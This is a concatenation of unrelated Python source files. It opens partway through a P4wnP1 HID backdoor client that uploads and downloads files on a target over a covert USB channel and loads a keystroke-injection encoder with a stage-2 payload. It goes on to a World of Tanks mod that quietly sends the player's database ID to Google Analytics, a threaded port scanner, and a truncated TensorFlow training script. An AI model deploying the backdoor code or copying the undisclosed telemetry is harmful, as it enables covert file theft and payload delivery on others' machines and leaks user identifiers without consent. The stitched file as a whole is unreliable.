stream_id = struct.unpack('!i', result)[0] #signed int
print "Remote FileStream with ID '{0}' opened".format(stream_id)
else:
print "File open Error: {0}".format(StructHelper.extractNullTerminatedString(result)[0])
return
else:
return
print "Uploading local file {0} to remote file {1}".format(source_path, target_path)
# if we are here, file open succeeded and we request a channel for the filestream
stream_channel = None
success, result = self.client_call_open_stream_channel(stream_id, passthrough=False)
if success:
channel_id = struct.unpack("!I", result)[0] # unsigned int
print "Opened stream channel with id {0}".format(channel_id)
# bind stream to local StreamChannel object
stream_channel = StreamChannel(channel_id, stream_id, False)
# add channel to client
self.client.addChannel(stream_channel)
else:
print "Open channel Error: {0}".format(StructHelper.extractNullTerminatedString(result)[0])
# ToDo: Remote stream should be destroyed
return
starttime = time.time()
# if here, we should have a valid stream_channel
# inform client that the channel has link
self.client_call_inform_channel_added(stream_channel)
# copy data to upload file in chunks
chunksize = 30000
readcount = -1
no_error = True
while readcount != 0:
readen = sourcefile.read(chunksize)
readcount = len(readen)
writeres = stream_channel.Write(readen)
sys.stdout.write(".")
if writeres == -1:
# write error (or channel closed)
print "\nError writing to file channel"
no_error = False
break
sys.stdout.flush()
sourcefile.close()
if no_error:
stream_channel.Flush()
# request streamChannel close
stream_channel.Close()
endtime = time.time()
print "\nUpload of '{0}' finished in {1:4.2f} seconds".format(source_path, endtime - starttime)
# Request close of remote FileStream file
if self.client.isConnected():
success, result = self.client_call_close_stream(stream_id)
else:
print "Remote file handle couldn't be closed, because client disconnected"
print
def do_download(self, line):
args = line.split(" ")
target_path = ""
source_path = ""
if len(args) == 0 or len(line) == 0:
print "you need to provide a file source"
return
elif len(args) == 1:
source_path = args[0].strip()
target_path = FileSystem.getFileName(source_path)
elif len(args) == 2:
source_path = args[0].strip()
target_path = args[1].strip()
else:
print "wrong argument count"
return
print "Downloading remote file {0} to local file {1}".format(source_path, target_path)
targetfile = None
# try to open local file first
try:
targetfile = FileSystem.open_local_file(target_path, FileMode.CreateNew, FileAccess.Write)
except Exception as e:
print e.message
print "Seems the file '{0}' exists or write permissions are missing!".format(target_path)
print "Do you want to try to overwrite the file"
overwrite = P4wnP1.askYesNo(default_yes=True)
if overwrite:
try:
targetfile = FileSystem.open_local_file(target_path, FileMode.Create, FileAccess.Write)
except Exception as e:
print e.message
return
else:
return
# Try to open remote file
success, result = self.client_call_open_file(remote_filename = source_path,
remote_filemode = FileMode.Open, # don't overwrite
remote_fileaccess = FileAccess.Read)
stream_id = -1
if success:
stream_id = struct.unpack("!i", result)[0] # signed int
print "Remote FileStream with ID '{0}' opened".format(stream_id)
print stream_id
else:
print "File open Error: {0}".format(StructHelper.extractNullTerminatedString(result)[0])
print "Seems the source file doesn't exist, aborting."
targetfile.close()
return
# if we are here, file open succeeded and we request a channel for the filestream
stream_channel = None
success, result = self.client_call_open_stream_channel(stream_id,
passthrough=False)
if success:
channel_id = struct.unpack("!I", result)[0] # unsigned int
print "Opened stream channel with id {0}".format(channel_id)
# bind stream to local StreamChannel object
stream_channel = StreamChannel(channel_id, stream_id, passthrough=False)
# add channel to client
self.client.addChannel(stream_channel)
else:
print "Open channel Error: {0}".format(StructHelper.extractNullTerminatedString(result)[0])
# ToDo: Remote stream should be destroyed
return
starttime = time.time()
# if here, we should have a valid stream_channel
# inform client that the channel has link
self.client_call_inform_channel_added(stream_channel)
count = -1
no_error = True
chunksize = 30000
while count != 0:
try:
readen = stream_channel.Read(chunksize)
count = len(readen)
if count > 0:
sys.stdout.write(".")
sys.stdout.flush()
targetfile.write(readen)
elif count == 0:
targetfile.flush()
targetfile.close()
except ChannelException as e:
print(e.__str__())
no_error = False
targetfile.close()
return # abort further reading
# close remote stream
if no_error:
# request streamChannel close
stream_channel.Close()
endtime = time.time()
print "\nDownload of '{0}' finished in {1:4.2f} seconds".format(source_path, endtime - starttime)
# Request close of remote FileStream file
if self.client.isConnected():
success, result = self.client_call_close_stream(stream_id)
else:
print "Remote file handle couldn't be closed, because client disconnected"
print
if __name__ == "__main__":
rundir = os.path.dirname(sys.argv[0])
basedir = os.path.abspath(rundir) + "/"
config = Config.conf_to_dict(basedir + "/config.txt")
config["BASEDIR"] = basedir
# replace relative path'
for key in config:
if key.startswith("PATH_"):
config[key] = os.path.abspath(config["BASEDIR"] + config[key])
try:
dev_file_in_path = config["HID_RAW_DEV"]
dev_file_out_path = config["HID_RAW_DEV"]
HIDin_file = open(dev_file_in_path, "rb")
HIDout_file = open(dev_file_out_path, "wb")
# the linklayer starts several communication threads
# for raw HID communication, the threads are started with separate start() method
ll = LinkLayer(HIDin_file, HIDout_file)
# transport layer automatically registers for linklayer events using pydispatcher
# in current implementation LinkLayer does nothing but providing an inbound queue
# Note: As every stream crosses TransportLayer, that would be the place to manipulate
# streams if needed (for example encryption)
tl = TransportLayer()
enc = DuckEncoder()
enc.setKeyDevFile(config["HID_KEYBOARD_DEV"])
enc.setLanguage(config["KEYBOARD_LANG"])
p4wnp1 = P4wnP1(ll, tl, config, duckencoder=enc)
with open(config["PATH_STAGE2_DOTNET"], "rb") as f:
p4wnp1.set_stage2(f.read())
p4wnp1.start() # starts link layer (waiting for initial connection) and server input thread
p4wnp1.cmdloop()
except:
import traceback
import exceptions
#print "Exception: " + str(type(e)) + ":"
#print "\t{}".format(e.message)
#exc_type, exc_obj, exc_tb = sys.exc_info()
#print "\tLine: {}".format(exc_tb.tb_lineno)
if sys.exc_type != exceptions.SystemExit:
traceback.print_exc()
raise
finally:
print "Cleaning Up..."
ll.stop() # send stop event to read and write loop of link layer
HIDout_file.close()
HIDin_file.close()
try:
p4wnp1.stop()
except:
pass
sys.exit()
|
mod_armoring_extended206.py | # -*- coding: utf-8 -*-
import codecs
import json
import os
import random
import re
import string
import threading
import urllib
import urllib2
from functools import partial
import BigWorld
import Math
import GUI
from constants import AUTH_REALM
from constants import VEHICLE_HIT_EFFECT
from gui import g_guiResetters
from gui.app_loader import g_appLoader
from gui.Scaleform import Minimap
from gui.Scaleform.Battle import Battle
from gui.Scaleform.daapi.view.lobby.LobbyView import LobbyView
from Vehicle import Vehicle
from VehicleEffects import DamageFromShotDecoder
from helpers import getLanguageCode
class _GUIConfig(object):
def __init__(self):
self.gui = {}
def register(self, name, template_func, settings_dict, apply_func):
if hasattr(BigWorld, 'mods_gui'):
# noinspection PyProtectedMember
self.gui[name] = BigWorld.mods_gui(name, template_func(), settings_dict, apply_func)
apply_func(self.gui[name].actual_settings)
def update(self, name, template_func):
self.gui[name].update_template(template_func())
class _Config(object):
def __init__(self):
self.ids = 'armoring_extended'
self.version = '2.06 (23.02.2016)'
self.author = 'by spoter, reven86'
self.path_config = './res_mods/configs/spoter_mods/%s/' % self.ids
self.path_lang = '%si18n/' % self.path_config
self.data = {
'enabled' : True,
'activate_message': True,
'only_HeavyTank' : False,
'show_text_shadow': True,
}
self.i18n = {
'UI_description' : 'Armoring Extended',
'UI_in_battle_main_text' : '<font size="14" color="#BDFA64"><font color="#fdf498">{NumDmg} Blocked <img align="top" src="img://gui/maps/icons/library/ClanBattleResultIcon-1.png" height="16" width="16" vspace="-3" '
'/><font '
'color="#fdf498">{AvgDmg}</font> damage</font>',
'UI_in_battle_activate_message' : 'Armoring Extended: Activated',
'UI_in_battle_activate_message_only_HeavyTank': 'Armoring Extended: Activated, only Heavy Tanks',
'UI_setting_activate_message_text' : 'Show activation message in battle',
'UI_setting_activate_message_tooltip' : '{HEADER}Info:{/HEADER}{BODY}When battle start, show notification message about mode Armoring Extended{/BODY}',
'UI_setting_heavy_tank_only_text' : 'Enable mod only on Heavy Tank',
'UI_setting_heavy_tank_only_tooltip' : '{HEADER}Info:{/HEADER}{BODY}Enable mod only on Heavy Tank, all other not available{/BODY}',
'UI_setting_show_text_shadow_text' : 'Show shadows on text',
'UI_setting_show_text_shadow_tooltip' : '{HEADER}Info:{/HEADER}{BODY}Show shadow on text in battle flash{/BODY}',
}
self.load_lang()
self.no_gui = False
self.json = {
'x': 0.0,
'y': 441.95
}
new_config = self.load_json(self.ids, self.json, self.path_config)
for setting in new_config:
if setting in self.json:
self.json[setting] = new_config[setting]
def load_lang(self):
lang = str(getLanguageCode()).lower()
new_config = self.load_json(lang, self.i18n, self.path_lang)
for setting in new_config:
if setting in self.i18n:
self.i18n[setting] = new_config[setting]
def template_settings(self):
return {
'modDisplayName' : self.i18n['UI_description'],
'settingsVersion': 104,
'enabled' : self.data['enabled'],
'column1' : [{
'type' : 'CheckBox',
'text' : self.i18n['UI_setting_activate_message_text'],
'value' : self.data['activate_message'],
'tooltip': self.i18n['UI_setting_activate_message_tooltip'],
'varName': 'activate_message'
}, {
'type' : 'CheckBox',
'text' : self.i18n['UI_setting_heavy_tank_only_text'],
'value' : self.data['only_HeavyTank'],
'tooltip': self.i18n['UI_setting_heavy_tank_only_tooltip'],
'varName': 'only_HeavyTank'
}],
'column2' : [{
'type' : 'CheckBox',
'text' : self.i18n['UI_setting_show_text_shadow_text'],
'value' : self.data['show_text_shadow'],
'tooltip': self.i18n['UI_setting_show_text_shadow_tooltip'],
'varName': 'show_text_shadow'
}]
}
def apply_settings(self, settings):
for setting in settings:
if setting in self.data:
self.data[setting] = settings[setting]
_gui_config.update('%s' % self.ids, self.template_settings)
@staticmethod
def json_comments(text):
regex = r'\s*(#|\/{2}).*$'
regex_inline = r'(:?(?:\s)*([A-Za-z\d\.{}]*)|((?<=\").*\"),?)(?:\s)*(((#|(\/{2})).*)|)$'
lines = text.split('\n')
excluded = []
for index, line in enumerate(lines):
if re.search(regex, line):
if re.search(r'^' + regex, line, re.IGNORECASE):
excluded.append(lines[index])
elif re.search(regex_inline, line):
lines[index] = re.sub(regex_inline, r'\1', line)
for line in excluded:
lines.remove(line)
return '\n'.join(lines)
def byte_ify(self, inputs):
if inputs:
if isinstance(inputs, dict):
return {self.byte_ify(key): self.byte_ify(value) for key, value in inputs.iteritems()}
elif isinstance(inputs, list):
return [self.byte_ify(element) for element in inputs]
elif isinstance(inputs, unicode):
return inputs.encode('utf-8')
else:
return inputs
return inputs
def load_json(self, name, config_old, path, save=False):
config_new = config_old
if not os.path.exists(path):
os.makedirs(path)
new_path = '%s%s.json' % (path, name)
if save:
with codecs.open(new_path, 'w', encoding='utf-8-sig') as json_file:
data = json.dumps(config_old, sort_keys=True, indent=4, ensure_ascii=False, encoding='utf-8-sig', separators=(',', ': '))
json_file.write('%s' % self.byte_ify(data))
json_file.close()
config_new = config_old
else:
if os.path.isfile(new_path):
try:
with codecs.open(new_path, 'r', encoding='utf-8-sig') as json_file:
data = self.json_comments(json_file.read().decode('utf-8-sig'))
config_new = self.byte_ify(json.loads(data))
json_file.close()
except Exception as e:
print '[ERROR]: %s' % e
else:
with codecs.open(new_path, 'w', encoding='utf-8-sig') as json_file:
data = json.dumps(config_old, sort_keys=True, indent=4, ensure_ascii=False, encoding='utf-8-sig', separators=(',', ': '))
json_file.write('%s' % self.byte_ify(data))
json_file.close()
config_new = config_old
print '[ERROR]: [Not found config, create default: %s' % new_path
return config_new
def load(self):
self.do_config()
print '[LOAD_MOD]: [%s v%s, %s]' % (self.ids, self.version, self.author)
def do_config(self):
if hasattr(BigWorld, 'mods_gui'):
_gui_config.register(name='%s' % self.ids, template_func=self.template_settings, settings_dict=self.data, apply_func=self.apply_settings)
else:
if not self.no_gui:
BigWorld.callback(1.0, self.do_config)
class _TextFlash(object):
def __init__(self, parent_ui, battleWindow, name, tooltip):
self.__parentUI = parent_ui
self.__battleWindow = battleWindow
self.__flashObject = None
self.name = name
self.tooltip = tooltip
self.debug = False
self.__battleWindow.addExternalCallback('%s.start' % self.name, self.start)
self.__battleWindow.addExternalCallback('%s.log' % self.name, self.log)
self.__battleWindow.addExternalCallback('%s.position' % self.name, self.position)
self.__battleWindow.getRoot().loadSwf('Extended.swf', '%s' % self.name, None)
self.text = {
'x' : _config.json.get('x', 100),
'y' : _config.json.get('y', 100),
'alignX' : 'center',
'alignY' : 'center',
'default_font' : '$IMELanguageBar',
'default_font_size' : 14,
'default_font_color': '#BDFA64'
}
self.shadow = {
'enabled' : _config.data.get('show_text_shadow', True),
'distance': 0,
'angle' : 90,
'color' : '#000000',
'alpha' : 100,
'size' : 3,
'strength': 200
}
self.background = {
'enabled': False,
'image' : '',
'x' : 218,
'y' : 448,
'width' : 250,
'height' : 27,
'alpha' : 80
}
def start(self, *args):
self.__flashObject = self.__parentUI.getMember('_level0.%s.battleFlash' % self.name)
self.__flashObject.script = self
g_guiResetters.add(self.as_onScreenResS)
self.set_def_config()
self.as_onScreenResS()
def set_def_config(self):
self.as_setTextS('')
self.as_setToolTipS('%s' % self.tooltip)
self.as_setPositionS(self.text['x'], self.text['y'])
if self.shadow['enabled']:
self.as_setShadowS(self.shadow['distance'], self.shadow['angle'], self.shadow['color'], self.shadow['alpha'], self.shadow['size'], self.shadow['strength'])
if self.background['enabled']:
self.as_setBgS(self.background['image'], self.background['x'], self.background['y'], self.background['width'], self.background['height'], self.background['alpha'])
def destroy(self):
g_guiResetters.discard(self.as_onScreenResS)
self.__flashObject = None
self.__battleWindow = None
self.__parentUI = None
def set_visible(self, boole):
if self.__flashObject:
self.as_setVisibleS(boole)
def set_shadow(self, distance_shadow, angle_shadow, color_shadow, alpha_shadow, size_shadow, strength_shadow):
if self.__flashObject:
self.as_setShadowS(distance_shadow, angle_shadow, color_shadow, alpha_shadow, size_shadow, strength_shadow)
def set_bg(self, image_bg, x_pos_bg, y_pos_bg, width_bg, height_bg, alpha_bg):
if self.__flashObject:
self.as_setBgS(image_bg, x_pos_bg, y_pos_bg, width_bg, height_bg, alpha_bg)
def set_text_flash(self, text):
_text = '<font size="%s" face="%s" color="%s" vspace="3" >%s</font>' % (self.text['default_font_size'], self.text['default_font'], self.text['default_font_color'], text)
self.as_setTextS(_text)
def set_text(self, text):
if self.__flashObject:
self.set_text_flash(text)
@property
def flashObject(self):
return self.__flashObject
def log(self, _, text):
if self.debug:
print('Extended.swf', '%s' % text)
def position(self, _, posX, posY):
self.text['x'] = posX
self.text['y'] = posY
_config.json['x'] = posX
_config.json['y'] = posY
_config.json = _config.load_json(_config.ids, _config.json, _config.path_config, True)
self.log(None, 'updatePosition : %s / %s in %s' % (posX, posY, self.name))
def as_onScreenResS(self):
wRes, hRes = GUI.screenResolution()
if self.flashObject:
self.flashObject.as_onScreenRes(wRes, hRes)
def as_setTextS(self, text):
if self.flashObject:
self.flashObject.as_setText(text)
def as_setSizeS(self, width, height):
if self.flashObject:
self.flashObject.as_setSize(width, height)
def as_setVisibleS(self, boole):
if self.flashObject:
self.flashObject.as_setVisible(boole)
def as_setPositionS(self, posX, posY):
if self.flashObject:
self.flashObject.as_setPosition(posX, posY)
def as_setToolTipS(self, text):
if self.flashObject:
self.flashObject.as_setToolTip(text)
def as_setShadowS(self, distance, angle, color, alpha, size, strength):
if self.flashObject:
self.flashObject.as_setShadow(distance, angle, color, alpha, size, strength)
def as_setBgS(self, image, posX, posY, width, height, alpha):
if self.flashObject:
self.flashObject.as_setBG(image, posX, posY, width, height, alpha)
class ArmoringExtended(object):
def __init__(self):
self.on_off = False
self.flash = None
self.num = 0
self.avgDMG = 0
self.SumAvgDmg = 0
self.list = {}
self.shots = 0
def cleanup_battle_data(self):
self.num = 0
self.avgDMG = 0
self.SumAvgDmg = 0
self.list = {}
self.shots = 0
@staticmethod
def message():
app = g_appLoader.getDefBattleApp()
if _config.data['only_HeavyTank']:
app.call('battle.PlayerMessagesPanel.ShowMessage',
['%s%s' % (_config.i18n['UI_in_battle_activate_message_only_HeavyTank'], random.choice(string.ascii_letters)), _config.i18n['UI_in_battle_activate_message_only_HeavyTank'].decode('utf-8-sig'), 'gold'])
else:
app.call('battle.PlayerMessagesPanel.ShowMessage', ['%s%s' % (_config.i18n['UI_in_battle_activate_message'], random.choice(string.ascii_letters)), _config.i18n['UI_in_battle_activate_message'].decode('utf-8-sig'), 'gold'])
def start_battle(self):
if not _config.data['enabled']: return
if _config.data['only_HeavyTank']:
if 'heavyTank' in BigWorld.player().vehicleTypeDescriptor.type.tags:
self.on_off = True
else: self.on_off = True
if _config.data['activate_message'] and self.on_off:
BigWorld.callback(5.0, self.message)
BigWorld.callback(5.0, self.shout_damage)
def clear_data(self):
self.avgDMG = 0
@staticmethod
def blocked_armor_hit(vehicle, decode_comp_name):
can_hit_primary_armor = None
comp_matrix = Math.Matrix(vehicle.appearance.modelsDesc[decode_comp_name.componentName]['model'].matrix)
first_hit_dir_local = decode_comp_name.matrix.applyToAxis(2)
first_hit_dir = comp_matrix.applyVector(first_hit_dir_local)
first_hit_point = decode_comp_name.matrix.translation
first_hit_pos = comp_matrix.applyPoint(first_hit_point)
world_to_veh_matrix = Math.Matrix(vehicle.model.matrix)
world_to_veh_matrix.invert()
start_point = world_to_veh_matrix.applyPoint(first_hit_pos - first_hit_dir)
end_point = world_to_veh_matrix.applyPoint(first_hit_pos + first_hit_dir.scale(10.0))
for compDescr, comp_matrix, isAttached in vehicle.getComponents():
if not isAttached: continue
collisions = compDescr['hitTester'].localHitTest(comp_matrix.applyPoint(start_point), comp_matrix.applyPoint(end_point))
if collisions is None: continue
for dist, _, hitAngleCos, matKind in collisions:
mat_info = compDescr['materials'].get(matKind)
can_hit_primary_armor = True if mat_info is not None and mat_info.useArmorHomogenization else False
if can_hit_primary_armor: break
if can_hit_primary_armor: break
return can_hit_primary_armor
def shout_damage(self):
if self.avgDMG != 0:
self.num += 1
self.SumAvgDmg += self.avgDMG
format_str = {
'NumDmg': BigWorld.wg_getIntegralFormat(self.num),
'AvgDmg': BigWorld.wg_getIntegralFormat(self.SumAvgDmg)
}
text = '%s' % _config.i18n['UI_in_battle_main_text']
self.flash.set_text(text.format(**format_str))
self.clear_data()
def shout_damage_hp(self, shots):
if self.list[shots]:
if self.list[shots]['isDamage']:
self.list[shots] = None
return
if self.list[shots]['avgDMG'] != 0:
self.num += 1
self.SumAvgDmg += self.list[shots]['avgDMG']
format_str = {
'NumDmg': BigWorld.wg_getIntegralFormat(self.num),
'AvgDmg': BigWorld.wg_getIntegralFormat(self.SumAvgDmg)
}
text = '%s' % _config.i18n['UI_in_battle_main_text']
self.flash.set_text(text.format(**format_str))
self.list[shots] = None
def shot(self, vehicle, attacker_id, points, effects_index):
if not (_config.data['enabled'] and self.on_off): return
if not vehicle.isStarted: return
if not vehicle.isPlayerVehicle: return
if BigWorld.player().team == BigWorld.player().arena.vehicles.get(attacker_id)['team']: return
if vehicle.health < 1: return
self.shots += 1
index_hit, decode_comp_name = DamageFromShotDecoder.decodeHitPoints(points, vehicle.typeDescriptor)
#compName = decode_comp_name[0].componentName if decode_comp_name else None
has_pierced_hit = index_hit >= VEHICLE_HIT_EFFECT.ARMOR_PIERCED
is_blocked = self.blocked_armor_hit(vehicle, decode_comp_name[0]) if decode_comp_name else False
if is_blocked:
for shell in BigWorld.player().arena.vehicles.get(attacker_id)['vehicleType'].gun['shots']:
if effects_index == shell['shell']['effectsIndex']:
type_shell = shell['shell']['kind']
if type_shell != 'HIGH_EXPLOSIVE':
self.avgDMG, _ = shell['shell']['damage']
if has_pierced_hit:
self.list[self.shots] = {
'id' : attacker_id,
'avgDMG' : self.avgDMG,
'isDamage': False,
'used' : False
}
BigWorld.callback(0.15, partial(self.shout_damage_hp, self.shots))
else: self.shout_damage()
break
else: self.clear_data()
def heal(self, vehicle, new_health, attacker_id):
if not (_config.data['enabled'] and self.on_off): return
if not vehicle.isStarted or not vehicle.isPlayerVehicle: return
is_damage = max(0, new_health)
if is_damage:
for shots in self.list:
if self.list[shots] and 'id' in self.list[shots] and self.list[shots]['id'] == attacker_id and not self.list[shots]['used']:
self.list[shots]['isDamage'] = True
self.list[shots]['used'] = True
break
class Statistics(object):
def __init__(self):
self.analytics_started = False
self._thread_analytics = None
self.tid = 'UA-57975916-9'
self.description_analytics = 'Мод: "Броняня"'
def analytics_do(self):
if not self.analytics_started:
player = BigWorld.player()
param = urllib.urlencode({
'v' : 1, # Version.
'tid': '%s' % self.tid, # Tracking ID / Property ID.
'cid': player.databaseID, # Anonymous Client ID.
't' : 'screenview', # Screenview hit type.
'an' : '%s' % self.description_analytics, # App name.
'av' : '%s %s' % (self.description_analytics, _config.version), # App version.
'cd' : 'start [%s]' % AUTH_REALM # Screen name / content description.
})
urllib2.urlopen(url='http://www.google-analytics.com/collect?', data=param).read()
self.analytics_started = True
def start(self):
self._thread_analytics = threading.Thread(target=self.analytics_do, name='Thread')
self._thread_analytics.start()
# deformed functions:
def hook_after_create(*args):
hooked_afterCreate(*args)
if _config.data['enabled']:
armor.flash = _TextFlash(args[0].proxy, args[0], _config.ids, '')
armor.cleanup_battle_data()
def hook_before_delete(*args):
hooked_beforeDelete(*args)
if _config.data['enabled']:
armor.cleanup_battle_data()
if armor.flash:
armor.flash.destroy()
armor.flash = None
def hook_vehicle_show_damage_from_shot(*args):
hooked_vehicle_show_damage_from_shot(*args) #(self, attackerID, points, effectsIndex, damageFactor)
if armor.on_off:
armor.shot(args[0], args[1], args[2], args[3])
def hook_vehicle_on_health_changed(*args):
hooked_vehicle_on_health_changed(*args) #(self, newHealth, attackerID, attackReasonID)
if armor.on_off:
armor.heal(args[0], args[1], args[2])
def hook_minimap_start(*args):
hooked_minimap_start(*args)
armor.start_battle()
def hook_update_all(*args):
hooked_update_all(*args)
try:
stat.start()
except Exception as e:
print('hook_update_all get stat', e)
#start mod
stat = Statistics()
_gui_config = _GUIConfig()
_config = _Config()
armor = ArmoringExtended()
_config.load()
#hooked
# noinspection PyProtectedMember
hooked_update_all = LobbyView._populate
hooked_afterCreate = Battle.afterCreate
hooked_beforeDelete = Battle.beforeDelete
# noinspection PyProtectedMember
hooked_vehicle_show_damage_from_shot = Vehicle.showDamageFromShot
hooked_vehicle_on_health_changed = Vehicle.onHealthChanged
hooked_minimap_start = Minimap.Minimap.start
#hook
LobbyView._populate = hook_update_all
Battle.afterCreate = hook_after_create
Battle.beforeDelete = hook_before_delete
# noinspection PyProtectedMember
Vehicle.showDamageFromShot = hook_vehicle_show_damage_from_shot
Vehicle.onHealthChanged = hook_vehicle_on_health_changed
Minimap.Minimap.start = hook_minimap_start
|
PORT_SCAN_V01.py | #import modules
import sys
import socket
import time
import threading
from queue import Queue
########################
#Time Set
time1 = time.time()
########################
#Auto Connect Close
socket.setdefaulttimeout(1)
lock = threading.Lock()
##################################
#User Guide Print
user_guide = 'Python3 PORT_SCAN.py Target_IP Starting_Port Ending_Port\n'
example = 'Example: Python3 PORT_SCAN.py 191.121.13.30 1 100'
###########################################################################
#Argument Check
if(len(sys.argv)!=4):
print(user_guide)
print(example)
sys.exit()
############################################################################
#Target Input
try:
target = socket.gethostbyname(sys.argv[1])
except socket.gaierror:
print("Name Resulation Error!")
sys.exit()
#############################################################################
#Input Start And End POrt
start_port = int(sys.argv[2])
end_port = int(sys.argv[3])
###########################################################################################################
#Printing Some Impormation
print("*"*80)
print("Start Scanning Target: {}.##########CREATED BY########################".format(target))
tport = (end_port - start_port)+1
print("Target Total {} Port.##########################SHAWON##########################".format(tport))
print("*"*80)
##############################################################################################################
#Scan Function
def scanning(port):
connections = socket.socket(socket.AF_INET , socket.SOCK_STREAM)
try:
connect = connections.connect((target,port))
with lock:
print("Port {} Is Open".format(port))
connections.close()
except:
pass
#################################################################################################################
#Boosting Scan
q = Queue()
def threat():
while True:
get1 = q.get()
scanning(get1)
q.task_done()
for i in range(1000):
th = threading.Thread(target = threat)
th.daemon = True
th.start()
for pt in range(start_port,end_port+1):
q.put(pt)
q.join()
##################################################################################################################
#Excuted Time Taken
end_time = time.time()
print("Time Estemeted: " + str(end_time - time1) + " Sec\n")
#Complite
|
train.py | # --------------------------------------------------------
# FCN
# Copyright (c) 2016 RSE at UW
# Licensed under The MIT License [see LICENSE for details]
# Written by Yu Xiang
# --------------------------------------------------------
"""Train a FCN"""
from fcn.config import cfg
from gt_data_layer.layer import GtDataLayer
from gt_single_data_layer.layer import GtSingleDataLayer
from gt_synthesize_layer.layer import GtSynthesizeLayer
from utils.timer import Timer
import numpy as np
import os
import tensorflow as tf
from tensorflow.python.framework.errors_impl import NotFoundError
import threading
from tools.common import smooth_l1_loss_vertex, combine_poses
from fcn.test import _extract_vertmap, plot_data
from generate_dataset.common import get_intrinsic_matrix
import io
import matplotlib.pyplot as plt
class Coordinator:
run = True
class SolverWrapper(object):
"""A simple wrapper around Caffe's solver.
This wrapper gives us control over he snapshotting process, which we
use to unnormalize the learned bounding-box regression weights.
"""
def __init__(self, sess, network, imdb, roidb, output_dir, pretrained_model=None, pretrained_ckpt=None):
"""Initialize the SolverWrapper."""
self.net = network
self.imdb = imdb
self.roidb = roidb
self.output_dir = output_dir
self.pretrained_model = pretrained_model
self.pretrained_ckpt = pretrained_ckpt
# For checkpoint
# self.saver = tf.train.Saver(tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES), max_to_keep=12)
self.saver = tf.train.Saver()
def snapshot(self, sess, iter, epoch=0):
"""Take a snapshot of the network after unnormalizing the learned
bounding-box regression weights. This enables easy use at test-time.
"""
if not os.path.exists(self.output_dir):
os.makedirs(self.output_dir)
infix = ('_' + cfg.TRAIN.SNAPSHOT_INFIX
if cfg.TRAIN.SNAPSHOT_INFIX != '' else '')
filename = (cfg.TRAIN.SNAPSHOT_PREFIX + infix + '_iter_{:d}_epoch_{:d}'.format(iter + 1, epoch + 1) + '.ckpt')
filename = os.path.join(self.output_dir, filename)
# self.saver.save(sess, filename, write_meta_graph=False)
self.saver.save(sess, filename)
print 'Wrote snapshot to: {:s}'.format(filename)
def restore(self, session, save_file):
try:
reader = tf.train.NewCheckpointReader(save_file)
saved_shapes = reader.get_variable_to_shape_map()
var_names = sorted([(var.name, var.name.split(':')[0]) for var in tf.global_variables()
if var.name.split(':')[0] in saved_shapes])
var_name_to_var = {var.name: var for var in tf.global_variables()}
restore_vars = []
restored_var_names = set()
print('Restoring:')
with tf.variable_scope(tf.get_variable_scope(), reuse=True):
for var_name, saved_var_name in var_names:
if 'global_step' in var_name:
continue
if 'Variable' in var_name:
continue
curr_var = var_name_to_var[var_name]
var_shape = curr_var.get_shape().as_list()
if var_shape == saved_shapes[saved_var_name]:
restore_vars.append(curr_var)
print(str(saved_var_name))
restored_var_names.add(saved_var_name)
else:
print('Shape mismatch for var', saved_var_name, 'expected', var_shape, 'got', saved_shapes[saved_var_name])
ignored_var_names = sorted(list(set(saved_shapes.keys()) - restored_var_names))
if len(ignored_var_names) == 0:
print('Restored all variables')
else:
print('Did not restore:' + '\n\t'.join(ignored_var_names))
if len(restore_vars) > 0:
print("In saver restore PoseCNN")
saver = tf.train.Saver(restore_vars)
saver.restore(session, save_file)
print('Restored %s' % save_file)
except NotFoundError as e:
print("Exception in restore")
print(e)
def train_model(self, sess, train_op, loss, loss_cls, loss_regu, learning_rate, iters_train, iters_val, data_layer):
"""Network training loop."""
# add summary
loss_op = tf.summary.scalar('loss', tf.squeeze(loss))
loss_cls_op = tf.summary.scalar('loss_cls', tf.squeeze(loss_cls))
loss_placeholder = tf.placeholder(tf.float32, shape=())
loss_cls_placeholder = tf.placeholder(tf.float32, shape=())
loss_val_op = tf.summary.scalar('loss_val', loss_placeholder)
loss_cls_val_op = tf.summary.scalar('loss_cls_val', loss_cls_placeholder)
train_writer = tf.summary.FileWriter(self.output_dir + "/train", sess.graph)
val_writer = tf.summary.FileWriter(self.output_dir + "/val", sess.graph)
img_str_placeholder = tf.placeholder(tf.string)
image = tf.image.decode_png(img_str_placeholder, channels=4)
# Add the batch dimension
image_expanded = tf.expand_dims(image, 0)
# Add image summary
img_op = tf.summary.image("Val predictions", image_expanded)
coord_train = Coordinator()
coord_val = Coordinator()
if self.pretrained_ckpt is None:
sess.run(tf.global_variables_initializer())
if self.pretrained_model is not None:
print ('Loading pretrained model '
'weights from {:s}').format(self.pretrained_model)
self.net.load(self.pretrained_model, sess, True)
else:
print ('Loading pretrained ckpt '
'weights from {:s}').format(self.pretrained_ckpt)
self.saver.restore(sess, self.pretrained_ckpt)
#self.restore(sess, self.pretrained_ckpt)
tf.get_default_graph().finalize()
tf.train.write_graph(sess.graph_def, self.output_dir, 'model.pbtxt')
last_snapshot_iter = -1
timer = Timer()
epochs = 5
intrinsic_matrix = get_intrinsic_matrix()
for epoch in range(epochs):
coord_train.run = True
coord_val.run = True
q_size = sess.run(self.net.q_size)
print("Queue size", q_size)
t = threading.Thread(target=load_and_enqueue, args=(sess, self.net, data_layer, coord_train, iters_train))
t.start()
t_val = threading.Thread(target=load_and_enqueue_val, args=(sess, self.net, data_layer, coord_val, iters_val))
print("Epoch: %d / %d" % (epoch, epochs))
for iter_train in range(iters_train):
timer.tic()
loss_summary, loss_cls_summary, loss_value, loss_cls_value, loss_regu_value, lr, _ = sess.run([loss_op, loss_cls_op, loss, loss_cls, loss_regu, learning_rate, train_op])
current_iter = iters_train * epoch + iter_train
train_writer.add_summary(loss_summary, current_iter)
train_writer.add_summary(loss_cls_summary, current_iter)
#starter_learning_rate = cfg.TRAIN.LEARNING_RATE
#lr = sess.run(clr.cyclic_learning_rate(global_step=iters_train * epoch + iter_train, learning_rate=starter_learning_rate, max_lr=starter_learning_rate*10,
# step_size=2, mode='triangular2', gamma=0.99994))
timer.toc()
print 'iter: %d / %d, loss: %.4f, loss_cls: %.4f, lr: %.8f, time: %.2f' % \
(iter_train + 1, iters_train, loss_value, loss_cls_value, lr, timer.diff)
if (iter_train + 1) % (10 * cfg.TRAIN.DISPLAY) == 0:
print 'speed: {:.3f}s / iter'.format(timer.average_time)
coord_train.run = False
q_size = sess.run(self.net.q_size)
print("Queue size", q_size)
t.join()
t_val.start()
for var in tf.global_variables():
result = sess.run(var)
np.save(var.name.replace("/", "_").replace(":", "_"), result)
